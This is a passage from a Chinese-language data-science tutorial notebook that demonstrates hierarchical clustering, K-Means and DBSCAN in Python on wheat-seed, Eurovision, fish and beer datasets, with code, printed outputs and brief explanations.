    4 14.11 14.26 0.8722 5.520 3.168 2.688 5.219 Kama wheat

    查看种子数据集的类别信息

    seeds_df.grain_variety.value_counts()
    Kama wheat        14Rosa wheat        14Canadian wheat    14Name: grain_variety, dtype: int64

    如果应用上述数据进行层次聚类, 需要去除样本数据集中的类别标识

    varieties = list(seeds_df.pop('grain_variety'))  # 去除类别
    samples = seeds_df.values # 去除 columns
    samples
    array([[14.88  , 14.57  ,  0.8811,  5.554 ,  3.333 ,  1.018 ,  4.956 ],       [14.69  , 14.49  ,  0.8799,  5.563 ,  3.259 ,  3.586 ,  5.219 ],       [14.03  , 14.16  ,  0.8796,  5.438 ,  3.201 ,  1.717 ,  5.001 ],       [13.99  , 13.83  ,  0.9183,  5.119 ,  3.383 ,  5.234 ,  4.781 ],       [14.11  , 14.26  ,  0.8722,  5.52  ,  3.168 ,  2.688 ,  5.219 ],       [13.02  , 13.76  ,  0.8641,  5.395 ,  3.026 ,  3.373 ,  4.825 ],       [15.49  , 14.94  ,  0.8724,  5.757 ,  3.371 ,  3.412 ,  5.228 ],       [16.2   , 15.27  ,  0.8734,  5.826 ,  3.464 ,  2.823 ,  5.527 ],       [13.5   , 13.85  ,  0.8852,  5.351 ,  3.158 ,  2.249 ,  5.176 ],       [15.36  , 14.76  ,  0.8861,  5.701 ,  3.393 ,  1.367 ,  5.132 ],       [15.78  , 14.91  ,  0.8923,  5.674 ,  3.434 ,  5.593 ,  5.136 ],       [14.46  , 14.35  ,  0.8818,  5.388 ,  3.377 ,  2.802 ,  5.044 ],       [11.23  , 12.63  ,  0.884 ,  4.902 ,  2.879 ,  2.269 ,  4.703 ],       [14.34  , 14.37  ,  0.8726,  5.63  ,  3.19  ,  1.313 ,  5.15  ],       [16.84  , 15.67  ,  0.8623,  5.998 ,  3.484 ,  4.675 ,  5.877 ],       [17.32  , 15.91  ,  0.8599,  6.064 ,  3.403 ,  3.824 ,  5.922 ],       [18.72  , 16.19  ,  0.8977,  6.006 ,  3.857 ,  5.324 ,  5.879 ],       [18.88  , 16.26  ,  0.8969,  6.084 ,  3.764 ,  1.649 ,  6.109 ],       [18.76  , 16.2   ,  0.8984,  6.172 ,  3.796 ,  3.12  ,  6.053 ],       [19.31  , 16.59  ,  0.8815,  6.341 ,  3.81  ,  3.477 ,  6.238 ],       [17.99  , 15.86  ,  0.8992,  5.89  ,  3.694 ,  2.068 ,  5.837 ],       [18.85  , 16.17  ,  0.9056,  6.152 ,  3.806 ,  2.843 ,  6.2   ],       [19.38  , 16.72  ,  0.8716,  6.303 ,  3.791 ,  3.678 ,  5.965 ],       [18.96  , 16.2   ,  0.9077,  6.051 ,  3.897 ,  4.334 ,  5.75  ],       [18.14  , 16.12  ,  0.8772,  6.059 ,  3.563 ,  3.619 ,  6.011 ],       [18.65  , 16.41  ,  0.8698,  6.285 ,  3.594 ,  4.391 ,  6.102 ],       [18.94  , 16.32  ,  0.8942,  6.144 ,  3.825 ,  2.908 ,  5.949 ],       [17.36  , 15.76  ,  0.8785,  6.145 ,  3.574 ,  3.526 ,  5.971 ],       [13.32  , 13.94  ,  0.8613,  5.541 ,  3.073 ,  7.035 ,  5.44  ],       [11.43  , 13.13  ,  0.8335,  5.176 ,  2.719 ,  2.221 ,  5.132 ],       [12.01  , 13.52  ,  0.8249,  5.405 ,  2.776 ,  6.992 ,  5.27  ],       [11.34  , 12.87  ,  0.8596,  5.053 ,  2.849 ,  3.347 ,  5.003 ],       [12.02  , 13.33  ,  0.8503,  5.35  ,  2.81  ,  4.271 ,  5.308 ],       [12.44  , 13.59  ,  0.8462,  5.319 ,  2.897 ,  4.924 ,  5.27  ],       [11.55  , 13.1   ,  0.8455,  5.167 ,  2.845 ,  6.715 ,  4.956 ],       [11.26  , 13.01  ,  0.8355,  5.186 ,  2.71  ,  5.335 ,  5.092 ],       [12.46  , 13.41  ,  0.8706,  5.236 ,  3.017 ,  4.987 ,  5.147 ],       [11.81  , 13.45  ,  0.8198,  5.413 ,  2.716 ,  4.898 ,  5.352 ],       [11.27  , 12.86  ,  0.8563,  5.091 ,  2.804 ,  3.985 ,  5.001 ],       [12.79  , 13.53  ,  0.8786,  5.224 ,  3.054 ,  5.483 ,  4.958 ],       [12.67  , 13.32  ,  0.8977,  4.984 ,  3.135 ,  2.3   ,  4.745 ],       [11.23  , 12.88  ,  0.8511,  5.14  ,  2.795 ,  4.325 ,  5.003 ]])

    进行层次聚类

    # 进行层次聚类
    mergings = linkage(samples, method='complete')

    # 绘制树状图
    plt.figure(figsize=(10,6),dpi=80)
    ax = plt.subplot(111)
    dendrogram(mergings,
    labels=varieties,
    leaf_rotation=90,
    leaf_font_size=10,)
    yminorLocator = MultipleLocator(0.2)
    ax.yaxis.set_minor_locator(yminorLocator)
    plt.show()

    png

    # 得到某一层次上的分类结果
    from scipy.cluster.hierarchy import fcluster

    # 获取最大分类距离为 6 的层次聚类结果
    labels = fcluster(mergings, 6, criterion='distance')

    df = pd.DataFrame({'labels': labels, 'varieties': varieties})
    # 统计每个簇中不同类别的个数
    ct = pd.crosstab(df['labels'], df['varieties'])
    ct
    varieties Canadian wheat Kama wheat Rosa wheat
    labels
    1 14 3 0
    2 0 0 14
    3 0 11 0
    2. 不同距离计算方式对层次聚类结果的影响
    import pandas as pd

    scores_df = pd.read_csv('eurovision-2016-televoting.csv', index_col=0)
    country_names = list(scores_df.index)
    scores_df.head()
    Armenia Australia Austria Azerbaijan Belgium Bulgaria Croatia Cyprus Czech Republic France ... Lithuania Malta Poland Russia Serbia Spain Sweden The Netherlands Ukraine United Kingdom
    From country
    Albania 2.0 12.0 0.0 0.0 0.0 8.0 0.0 0.0 0.0 0.0 ... 4.0 0.0 5.0 7.0 0.0 0.0 3.0 0.0 6.0 0.0
    Armenia NaN 0.0 4.0 0.0 0.0 0.0 0.0 6.0 0.0 7.0 ... 0.0 5.0 1.0 12.0 0.0 0.0 2.0 0.0 10.0 0.0
    Australia 0.0 NaN 3.0 0.0 12.0 10.0 0.0 0.0 0.0 7.0 ... 1.0 6.0 0.0 5.0 0.0 2.0 0.0 0.0 8.0 4.0
    Austria 0.0 3.0 NaN 0.0 0.0 5.0 0.0 0.0 0.0 1.0 ... 0.0 0.0 12.0 8.0 4.0 0.0 7.0 6.0 10.0 0.0
    Azerbaijan 0.0 2.0 0.0 NaN 0.0 8.0 0.0 0.0 0.0 4.0 ... 0.0 5.0 3.0 12.0 0.0 0.0 0.0 0.0 10.0 0.0

    5 rows × 26 columns

    # 填充 Nan 数据
    scores_df = scores_df.fillna(12)

    from sklearn.preprocessing import normalize

    # 数据归一化处理
    samples = normalize(scores_df.values)
    samples
    array([[0.09449112, 0.56694671, 0.        , ..., 0.        , 0.28347335,        0.        ],       [0.49319696, 0.        , 0.16439899, ..., 0.        , 0.41099747,        0.        ],       [0.        , 0.49319696, 0.12329924, ..., 0.        , 0.32879797,        0.16439899],       ...,       [0.32879797, 0.20549873, 0.24659848, ..., 0.49319696, 0.28769823,        0.        ],       [0.28769823, 0.16439899, 0.        , ..., 0.        , 0.49319696,        0.        ],       [0.        , 0.24659848, 0.        , ..., 0.        , 0.20549873,        0.49319696]])
    plt.figure(figsize=(10,12),dpi=80)
    plt.subplots_adjust(hspace=0.5)

    # single method distance clustering 最短距离
    mergings = linkage(samples, method='single')
    p1 = plt.subplot(211)
    yminorLocator = MultipleLocator(0.05)
    p1.yaxis.set_minor_locator(yminorLocator)
    dendrogram(mergings,
    labels=country_names,
    leaf_rotation=90,
    leaf_font_size=10,
    )
    p1.set_title("single-min distance",fontsize=18)

    # complete method distance clustering 最长距离
    mergings = linkage(samples, method='complete')
    p2 = plt.subplot(212)
    yminorLocator = MultipleLocator(0.05)
    p2.yaxis.set_minor_locator(yminorLocator)
    dendrogram(mergings,
    labels=country_names,
    leaf_rotation=90,
    leaf_font_size=10,
    )
    p2.set_title("complete-max distance",fontsize=18)

    plt.show()

    png

    16.3 K-Means 聚类

    【机器学习】K-means(非常详细)

    K-means 有一个著名的解释:牧师—村民模型:

    有四个牧师去郊区布道,一开始牧师们随意选了几个布道点,并且把这几个布道点的情况公告给了郊区所有的村民,于是每个村民到离自己家最近的布道点去听课。
    听课之后,大家觉得距离太远了,于是每个牧师统计了一下自己的课上所有的村民的地址,搬到了所有地址的中心地带,并且在海报上更新了自己的布道点的位置。
    牧师每一次移动不可能离所有人都更近,有的人发现 A 牧师移动以后自己还不如去 B 牧师处听课更近,于是每个村民又去了离自己最近的布道点……
    就这样,牧师每个礼拜更新自己的位置,村民根据自己的情况选择布道点,最终稳定了下来

    • 优势: 简单, 快速, 适合常规数据集

    • 劣势: K 值难确定, 复杂度与样本呈线性关系, 很难发现任意形状的簇

    16.3.2 K-Means 算法流程

    • 1 选择 K 个数据点作为数据簇的质心

    • 2 计算每个数据点与 K 个质心之间的距离(可选, 一般是欧氏距离), 将其分配到最近的质心所代表的簇中, 形成 K 个簇

    • 3 重新计算 K 个簇的质心

    • 4 重复 2-3, 直至 K 个簇的质心都不再发生变化

    16.3.4 K-Means 聚类实例

    1. 应用 sklearn.cluster 模块中的 K-Means 进行聚类操作
    1. 读出数据文件中的数据, 分析显示数据的结构
    import matplotlib.pyplot as plt
    from sklearn.cluster import KMeans
    import pandas as pd

    df = pd.read_csv("ch1ex1.csv")
    points = df.values
    df.head()
    0 1
    0 0.065446 -0.768664
    1 -1.529015 -0.429531
    2 1.709934 0.698853
    3 1.167791 1.012626
    4 -1.801101 -0.318613
    1. 原始数据样本的散点图绘制
    plt.figure(figsize=(10, 6), dpi=80)

    xs = points[:, 0]
    ys = points[:, 1]

    plt.scatter(xs, ys)
    plt.show()

    png

    可以看出数据样本点分成形状较规则的 3 个部分, 使用 K-Means 算法进行聚类

    1. 聚类操作
    model = KMeans(n_clusters=3)
    model.fit(points)
    labels = model.predict(points)
    print(labels)
    [1 2 0 0 2 2 0 1 2 2 0 1 2 0 2 1 0 0 1 0 2 1 2 1 1 2 1 1 1 2 0 0 0 2 1 2 1 1 2 1 1 0 2 2 2 1 1 0 1 0 0 0 1 1 1 2 1 1 2 0 2 1 1 0 0 2 0 2 2 1 0 2 0 1 0 2 1 1 1 0 1 2 0 2 2 2 2 1 1 0 2 0 2 1 1 1 0 2 2 0 2 1 2 0 1 0 0 0 2 2 1 2 0 2 2 2 1 2 0 0 1 1 1 1 1 2 0 1 2 2 0 0 2 1 2 1 0 2 0 1 0 0 1 0 0 1 0 2 1 1 1 0 0 2 0 2 1 1 0 2 0 0 0 2 1 1 2 0 0 1 1 0 1 1 2 1 0 0 0 1 1 0 1 0 0 1 2 0 1 1 1 1 2 0 1 2 2 2 1 2 1 1 2 0 0 1 0 1 1 2 2 1 0 2 0 1 0 2 1 2 2 2 2 0 0 0 1 1 2 1 0 2 1 1 2 1 0 0 0 0 0 2 1 1 0 0 1 2 0 2 2 1 1 2 2 2 1 0 1 2 1 0 0 0 0 0 1 1 2 1 1 2 0 0 2 1 0 0 2 2 1 1 1 2 2 1 0 2 2 0 1 1 1 2 1 1 1 2 2 2]

    显示了 300 个数据样本点的聚类结果, 即将它们分别归到 0, 1, 2 这 3 个簇中

    1. 聚类结果的数据显示
    # 聚类中心
    centroids = model.cluster_centers_
    centroids_x = centroids[:, 0] # 重心 x 坐标
    centroids_y = centroids[:, 1] # 重心 y 坐标

    # 原始数据点
    xs = points[:, 0]
    ys = points[:, 1]

    # 创建标记和颜色 list
    mk0 = ['o', ',', 'v'] # 符号形状
    cs0 = ['r', 'g', 'b'] # 颜色
    mk1 = [] # 各个点的符号形状
    cs1 = [] # 各个点的颜色
    for e in labels:
    mk1.append(mk0[e])
    cs1.append(cs0[e])

    plt.figure(figsize=(10, 6), dpi=120)
    plt.subplot(111)
    for x, y, cr, m in zip(xs, ys, cs1, mk1):
    plt.scatter(x, y, edgecolors=cr, facecolors='none', marker=m)
    plt.scatter(centroids_x, centroids_y, marker='X', s=200, c='k') # 绘制重心
    plt.show()

    png

    2. 显示 K 值对聚类结果的影响

    找不到 seeds.csv 这个文件, 用 seeds-less-rows.csv 代替一下吧

    import pandas as pd
    from sklearn.cluster import KMeans
    import matplotlib.pyplot as plt

    seeds_df = pd.read_csv('seeds-less-rows.csv')
    varieties = list(seeds_df['grain_variety'])
    del seeds_df['grain_variety']
    samples = seeds_df.values
    ks = range(1, 6)
    inertias = []

    for k in ks:
    # Create a KMeans instance with k clusters: model
    model = KMeans(n_clusters=k)
    # Fit model to samples
    model.fit(samples)
    # Append the inertia to the list of inertias
    inertias.append(model.inertia_)

    plt.figure(figsize=(10,6),dpi=80)
    plt.subplot(111)
    # Plot ks vs inertias
    plt.plot(ks, inertias, '-o')
    plt.xlabel('number of clusters, k')
    plt.ylabel('inertia')
    plt.xticks(ks)
    plt.show()
    C:\Users\gzjzx\anaconda3\lib\site-packages\sklearn\cluster\_kmeans.py:1036: UserWarning: KMeans is known to have a memory leak on Windows with MKL, when there are less chunks than available threads. You can avoid it by setting the environment variable OMP_NUM_THREADS=1.  warnings.warn(

    png

    随着 K 值增大, 聚类结果拥有更小的 interias 指标(表示样本数据点到所属簇的质心的距离综合), 结果更具有合理性

    3. 使用 sklearn.pipeline 模块中的 make_pipeline 简化操作
    import pandas as pd

    df = pd.read_csv('fish.csv')
    species = list(df['species'])
    del df['species']
    df.head()
    weight length1 length2 length3 height width
    0 242.0 23.2 25.4 30.0 38.4 13.4
    1 290.0 24.0 26.3 31.2 40.0 13.8
    2 340.0 23.9 26.5 31.1 39.8 15.1
    3 363.0 26.3 29.0 33.5 38.0 13.3
    4 430.0 26.5 29.0 34.0 36.6 15.1

    通过 pipeline 模块, 组合调用数据预处理, 数据聚类等操作, 实现数据的聚类

    from sklearn.pipeline import make_pipeline
    from sklearn.preprocessing import StandardScaler
    from sklearn.cluster import KMeans

    samples = df.values
    scaler = StandardScaler()
    kmeans = KMeans(n_clusters=4)

    pipeline = make_pipeline(scaler, kmeans)
    pipeline.fit(samples)

    labels = pipeline.predict(samples)
    df = pd.DataFrame({'labels': labels, 'species': species})
    ct = pd.crosstab(df['labels'], df['species'])
    ct
    species Bream Pike Roach Smelt
    labels
    0 33 0 1 0
    1 1 0 19 1
    2 0 17 0 0
    3 0 0 0 13

    16.4 DBSCAN 聚类

    LATER ADD TO QUEUE Clustering with DBSCAN, Clearly Explained!!!(Youtube)

    png

    • Eps- 邻域

      • 由用户设定, 以某个数据点为圆心, 以 Eps 的值为半径, 形成一个邻域
    • MinPts 阈值

      • 度量 Eps- 邻域 内数据点数量的一个阈值. 对二维的数据集而言, 一般取 MinPts = 4
    • 核心点

      • 在数据点的 Eps- 邻域 中, 如果数据点的数量 ≥ Minpts, 则该数据点被称为核心点
    • 边界点

      • 数据点的 Eps- 邻域 中, 数据点的数量 < MinPts, 但该点的 Eps- 邻域 内至少有一个核心点 或 该点落在某个核心点的 Eps- 邻域 内, 则称该数据为边界点
    • 噪声点

      • 在数据点的 Eps- 邻域 中, 数据点的数量<MinPts, 但该点不是边界点, 即该点的 Eps- 邻域 内没有任何一个核心点, 则称该点为噪声点

    16.4.3 DBSCAN 聚类实例

    #16-10.py

    import numpy as np
    import matplotlib.pyplot as plt
    from sklearn import datasets
    from sklearn.cluster import DBSCAN
    from collections import Counter
    %matplotlib inline

    plt.figure(figsize=(12,8),dpi=100)

    # Generate the Data Source with sklearn
    """
    make_moons 是函数用来生成数据集
    n_numbers:生成样本数量
    shuffle:数据是否打乱
    noise:默认是 false,数据集是否加入高斯噪声
    random_state:生成随机种子,给定一个 int 型数据,能够保证每次生成数据相同。
    """
    X1, _ = datasets.make_moons(n_samples=500, noise=.05)
    X2, _ = datasets.make_blobs(n_samples=100, n_features=2, centers=[[1.2,1.2]],
    cluster_std=[[.1]],random_state=9)
    X = np.concatenate((X1, X2))

    # colors and markers for the scatter graph
    # 前 6 个为分类标识, 最后一个为噪声点标识
    colors = ['black','green','yellow','brown','blue','orange','red']
    markers = ['o',',','v','^','<','>','x']

    # Graph for the Data Source
    p11 = plt.subplot(221)
    p11.set_title('Data Source Graph')
    plt.scatter(X[:, 0], X[:, 1],c=colors[0], marker=markers[0])

    # Graph for the clustering with default params
    p12 = plt.subplot(222)
    p12.set_title('Clustering BY DB with Defaut params')
    y_pred = DBSCAN().fit_predict(X)
    for x,y,i in zip(X[:,0],X[:,1],y_pred):
    plt.scatter(x,y,c=colors[i],marker=markers[i])

    # Graph for the clustering with specified params
    p21 = plt.subplot(223)
    p21.set_title('Clustering BY DB with Eps=0.1')
    y_pred = DBSCAN(eps = 0.10, min_samples = 10).fit_predict(X)
    for x,y,i in zip(X[:,0],X[:,1],y_pred):
    plt.scatter(x,y,c=colors[i],marker=markers[i])

    # Graph for the clustering with specified params
    p22 = plt.subplot(224)
    p22.set_title('Clustering BY DB with Eps=0.12')
    y_pred = DBSCAN(eps = 0.12, min_samples = 10).fit_predict(X)
    for x,y,i in zip(X[:,0],X[:,1],y_pred):
    plt.scatter(x,y,c=colors[i],marker=markers[i])

    plt.show()

    png

    16.5 综合实例——聚类分析

    使用 K-Means 算法和 DBSCAN 算法分析一个有关啤酒的数据集

    1 数据集读入及预处理

    import pandas as pd

    beer = pd.read_csv('data.txt', sep=' ')
    beer
    name calories sodium alcohol cost
    0 Budweiser 144 15 4.7 0.43
    1 Schlitz 151 19 4.9 0.43
    2 Lowenbrau 157 15 0.9 0.48
    3 Kronenbourg 170 7 5.2 0.73
    4 Heineken 152 11 5.0 0.77
    5 Old_Milwaukee 145 23 4.6 0.28
    6 Augsberger 175 24 5.5 0.40
    7 Srohs_Bohemian_Style 149 27 4.7 0.42
    8 Miller_Lite 99 10 4.3 0.43
    9 Budweiser_Light 113 8 3.7 0.40
    10 Coors 140 18 4.6 0.44
    11 Coors_Light 102 15 4.1 0.46
    12 Michelob_Light 135 11 4.2 0.50
    13 Becks 150 19 4.7 0.76
    14 Kirin 149 6 5.0 0.79
    15 Pabst_Extra_Light 68 15 2.3 0.38
    16 Hamms 139 19 4.4 0.43
    17 Heilemans_Old_Style 144 24 4.9 0.43
    18 Olympia_Goled_Light 72 6 2.9 0.46
    19 Schlitz_Light 97 7 4.2 0.47

    2 K-Means 聚类

    from sklearn.cluster import KMeans

    X = beer[['calories', 'sodium', 'alcohol', 'cost']]

    km2 = KMeans(n_clusters=2).fit(X) # K = 2 时的聚类结果
    km3 = KMeans(n_clusters=3).fit(X) # K = 3 时的聚类结果
    beer['cluster2'] = km2.labels_
    beer['cluster3'] = km3.labels_
    beer.sort_values('cluster2')
    name calories sodium alcohol cost cluster2 cluster3
    0 Budweiser 144 15 4.7 0.43 0 0
    1 Schlitz 151 19 4.9 0.43 0 0
    2 Lowenbrau 157 15 0.9 0.48 0 0
    3 Kronenbourg 170 7 5.2 0.73 0 0
    4 Heineken 152 11 5.0 0.77 0 0
    5 Old_Milwaukee 145 23 4.6 0.28 0 0
    6 Augsberger 175 24 5.5 0.40 0 0
    7 Srohs_Bohemian_Style 149 27 4.7 0.42 0 0
    17 Heilemans_Old_Style 144 24 4.9 0.43 0 0
    16 Hamms 139 19 4.4 0.43 0 0
    10 Coors 140 18 4.6 0.44 0 0
    12 Michelob_Light 135 11 4.2 0.50 0 0
    13 Becks 150 19 4.7 0.76 0 0
    14 Kirin 149 6 5.0 0.79 0 0
    15 Pabst_Extra_Light 68 15 2.3 0.38 1 2
    9 Budweiser_Light 113 8 3.7 0.40 1 1
    18 Olympia_Goled_Light 72 6 2.9 0.46 1 2
    8 Miller_Lite 99 10 4.3 0.43 1 1
    11 Coors_Light 102 15 4.1 0.46 1 1
    19 Schlitz_Light 97 7 4.2 0.47 1 1

    3 聚类结果分析

    beer.groupby('cluster2').mean()
    calories sodium alcohol cost cluster3
    cluster2
    0 91.833333 10.166667 3.583333 0.433333 0.666667
    1 150.000000 17.000000 4.521429 0.520714 1.000000
    beer.groupby('cluster3').mean()
    calories sodium alcohol cost cluster2
    cluster3
    0 102.75 10.0 4.075000 0.440000 0.0
    1 150.00 17.0 4.521429 0.520714 1.0
    2 70.00 10.5 2.600000 0.420000 0.0

    4 聚类结果的图形显示

    import matplotlib.pyplot as plt
    import numpy as np
    from pandas.plotting import scatter_matrix

    plt.rcParams['font.size'] = 14
    plt.rcParams['figure.figsize'] = (10, 6)

    centers = beer.groupby('cluster3').mean().reset_index()
    colors = np.array(['red', 'green', 'blue', 'yellow'])
    markers = np.array(['o', ',', 'v', '^'])
    for x, y, cr, mr in zip(beer['calories'], beer['alcohol'], colors[beer['cluster3']], markers[beer['cluster3']]):
    plt.scatter(x, y, c=cr, marker=mr)
    plt.scatter(centers.calories, centers.alcohol, linewidths=3, marker='+', s=300, c='black')
    plt.xlabel('Calories')
    plt.ylabel('Alcohol')
    plt.title('Clustering Result with K = 3')

    # K = 2
    scatter_matrix(beer[['calories', 'sodium', 'alcohol', 'cost']], s=100, alpha=1,
    c=colors[beer["cluster2"]], figsize=(10, 10))
    plt.suptitle("With 2 centroids initialized", x=0.5, y=0.92)

    # K = 3
    scatter_matrix(beer[['calories', 'sodium', 'alcohol', 'cost']], s=100, alpha=1,
    c=colors[beer["cluster3"]], figsize=(10, 10))
    plt.suptitle("With 3 centroids initialized", x=0.5, y=0.92)

    plt.show()

    png

    png

    png

    5 数据经标准化之后的聚类分析

    sklearn 库的 StandardScaler 模型提供了一种数据标准化方法, 主要用于数据列的变换

    $$z=\frac{x-\mu}{s}$$

    $x$表示待标准化的数据, $\mu$表示数据的均值, $s$表示数据的标准差

    from sklearn.preprocessing import StandardScaler

    scaler = StandardScaler()
    X_scaled = scaler.fit_transform(X)
    X_scaled
    array([[ 0.38791334,  0.00779468,  0.43380786, -0.45682969],       [ 0.6250656 ,  0.63136906,  0.62241997, -0.45682969],       [ 0.82833896,  0.00779468, -3.14982226, -0.10269815],       [ 1.26876459, -1.23935408,  0.90533814,  1.66795955],       [ 0.65894449, -0.6157797 ,  0.71672602,  1.95126478],       [ 0.42179223,  1.25494344,  0.3395018 , -1.5192243 ],       [ 1.43815906,  1.41083704,  1.1882563 , -0.66930861],       [ 0.55730781,  1.87851782,  0.43380786, -0.52765599],       [-1.1366369 , -0.7716733 ,  0.05658363, -0.45682969],       [-0.66233238, -1.08346049, -0.5092527 , -0.66930861],       [ 0.25239776,  0.47547547,  0.3395018 , -0.38600338],       [-1.03500022,  0.00779468, -0.13202848, -0.24435076],       [ 0.08300329, -0.6157797 , -0.03772242,  0.03895447],       [ 0.59118671,  0.63136906,  0.43380786,  1.88043848],       [ 0.55730781, -1.39524768,  0.71672602,  2.0929174 ],       [-2.18688263,  0.00779468, -1.82953748, -0.81096123],       [ 0.21851887,  0.63136906,  0.15088969, -0.45682969],       [ 0.38791334,  1.41083704,  0.62241997, -0.45682969],       [-2.05136705, -1.39524768, -1.26370115, -0.24435076],       [-1.20439469, -1.23935408, -0.03772242, -0.17352445]])

    大部分数据都在-2~2 之间, 数据范围基本一致

    # 对标准化后的数据重新进行 K-Means 聚类
    km = KMeans(n_clusters=3).fit(X_scaled)
    beer["scaled_cluster"] = km.labels_
    beer.sort_values('scaled_cluster')
    name calories sodium alcohol cost cluster2 cluster3 scaled_cluster
    9 Budweiser_Light 113 8 3.7 0.40 0 0 0
    15 Pabst_Extra_Light 68 15 2.3 0.38 0 2 0
    12 Michelob_Light 135 11 4.2 0.50 1 1 0
    11 Coors_Light 102 15 4.1 0.46 0 0 0
    18 Olympia_Goled_Light 72 6 2.9 0.46 0 2 0
    8 Miller_Lite 99 10 4.3 0.43 0 0 0
    19 Schlitz_Light 97 7 4.2 0.47 0 0 0
    2 Lowenbrau 157 15 0.9 0.48 1 1 0
    7 Srohs_Bohemian_Style 149 27 4.7 0.42 1 1 1
    5 Old_Milwaukee 145 23 4.6 0.28 1 1 1
    10 Coors 140 18 4.6 0.44 1 1 1
    1 Schlitz 151 19 4.9 0.43 1 1 1
    16 Hamms 139 19 4.4 0.43 1 1 1
    17 Heilemans_Old_Style 144 24 4.9 0.43 1 1 1
    6 Augsberger 175 24 5.5 0.40 1 1 1
    0 Budweiser 144 15 4.7 0.43 1 1 1
    4 Heineken 152 11 5.0 0.77 1 1 2
    3 Kronenbourg 170 7 5.2 0.73 1 1 2
    13 Becks 150 19 4.7 0.76 1 1 2
    14 Kirin 149 6 5.0 0.79 1 1 2
    # 通过每一簇的平均值, 来观察聚类结果的特征
    beer.groupby('scaled_cluster').mean()
    calories sodium alcohol cost cluster2 cluster3
    scaled_cluster
    0 105.375 10.875 3.3250 0.4475 0.25 0.75
    1 148.375 21.125 4.7875 0.4075 1.00 1.00
    2 155.250 10.750 4.9750 0.7625 1.00 1.00
    scatter_matrix(X, c=colors[beer.scaled_cluster], alpha=1, figsize=(10, 10), s=100)
    array([[<AxesSubplot:xlabel='calories', ylabel='calories'>,        <AxesSubplot:xlabel='sodium', ylabel='calories'>,        <AxesSubplot:xlabel='alcohol', ylabel='calories'>,        <AxesSubplot:xlabel='cost', ylabel='calories'>],       [<AxesSubplot:xlabel='calories', ylabel='sodium'>,        <AxesSubplot:xlabel='sodium', ylabel='sodium'>,        <AxesSubplot:xlabel='alcohol', ylabel='sodium'>,        <AxesSubplot:xlabel='cost', ylabel='sodium'>],       [<AxesSubplot:xlabel='calories', ylabel='alcohol'>,        <AxesSubplot:xlabel='sodium', ylabel='alcohol'>,        <AxesSubplot:xlabel='alcohol', ylabel='alcohol'>,        <AxesSubplot:xlabel='cost', ylabel='alcohol'>],       [<AxesSubplot:xlabel='calories', ylabel='cost'>,        <AxesSubplot:xlabel='sodium', ylabel='cost'>,        <AxesSubplot:xlabel='alcohol', ylabel='cost'>,        <AxesSubplot:xlabel='cost', ylabel='cost'>]], dtype=object)

    png

    得出结论: 对数据的标准化操作, 不一定会使数据的聚类结果更加有效

    6 聚类结果评估

    # 计算轮廓系数
    from sklearn import metrics
    score_scaled = metrics.silhouette_score(X, beer.scaled_cluster)
    score = metrics.silhouette_score(X, beer.cluster3)
    score_scaled, score
    (0.1797806808940007, 0.6731775046455796)

    未标准化的数据反而有更大的轮廓系数更精确的聚类结果

    这说明, 数据集在聚类过程中, 某些数据列具有更高的权值, 这可能是数据本身的要求

    7 通过轮廓系数来确定 K-Means 聚类参数

    # 在 2~20 持续变化 K 值, 对同一数据进行 K-Means 聚类, 并计算轮廓系数
    scores = []
    for k in range(2, 20):
    labels = KMeans(n_clusters=k).fit(X).labels_
    score = metrics.silhouette_score(X, labels)
    scores.append(score)
    scores
    [0.6917656034079486, 0.6731775046455796, 0.5857040721127795, 0.422548733517202, 0.4559182167013377, 0.43776116697963124, 0.38946337473125997, 0.39746405172426014, 0.3915697409245163, 0.3413109618039333, 0.3459775237127248, 0.31221439248428434, 0.30707782144770296, 0.31834561839139497, 0.2849514001174898, 0.23498077333071996, 0.1588091017496281, 0.08423051380151177]

    随着 K 值的增加, 轮廓系数系数不断变小, 聚类效果变差

    plt.plot(list(range(2, 20)), scores)
    plt.xlabel('Number of Clusters Initialized')
    plt.ylabel('Sihouette Score')
    Text(0, 0.5, 'Sihouette Score')

    png

    8 DBSCAN 聚类

    from sklearn.cluster import DBSCAN

    db = DBSCAN(eps=10, min_samples=2).fit(X)
    labels = db.labels_
    beer['cluster_db'] = labels
    beer.sort_values('cluster_db')
    name calories sodium alcohol cost cluster2 cluster3 cluster_db
    9 Budweiser_Light 113 8 3.7 0.40 1 1 -1
    3 Kronenbourg 170 7 5.2 0.73 0 0 -1
    6 Augsberger 175 24 5.5 0.40 0 0 -1
    17 Heilemans_Old_Style 144 24 4.9 0.43 0 0 0
    16 Hamms 139 19 4.4 0.43 0 0 0
    14 Kirin 149 6 5.0 0.79 0 0 0
    13 Becks 150 19 4.7 0.76 0 0 0
    12 Michelob_Light 135 11 4.2 0.50 0 0 0
    10 Coors 140 18 4.6 0.44 0 0 0
    0 Budweiser 144 15 4.7 0.43 0 0 0
    7 Srohs_Bohemian_Style 149 27 4.7 0.42 0 0 0
    5 Old_Milwaukee 145 23 4.6 0.28 0 0 0
    4 Heineken 152 11 5.0 0.77 0 0 0
    2 Lowenbrau 157 15 0.9 0.48 0 0 0
    1 Schlitz 151 19 4.9 0.43 0 0 0
    8 Miller_Lite 99 10 4.3 0.43 1 1 1
    11 Coors_Light 102 15 4.1 0.46 1 1 1
    19 Schlitz_Light 97 7 4.2 0.47 1 1 1
    15 Pabst_Extra_Light 68 15 2.3 0.38 1 2 2
    18 Olympia_Goled_Light 72 6 2.9 0.46 1 2 2

    -1 表示噪声点, 其他表示分类点, 与 K-Means 的聚类结果基本相符

    beer.groupby('cluster_db').mean()
    calories sodium alcohol cost cluster2 cluster3
    cluster_db
    -1 152.666667 13.000000 4.800000 0.510000 0.333333 0.333333
    0 146.250000 17.250000 4.383333 0.513333 0.000000 0.000000
    1 99.333333 10.666667 4.200000 0.453333 1.000000 1.000000
    2 70.000000 10.500000 2.600000 0.420000 1.000000 2.000000
    scatter_matrix(X, c=colors[beer.cluster_db], alpha=1, figsize=(10, 10), s=100)
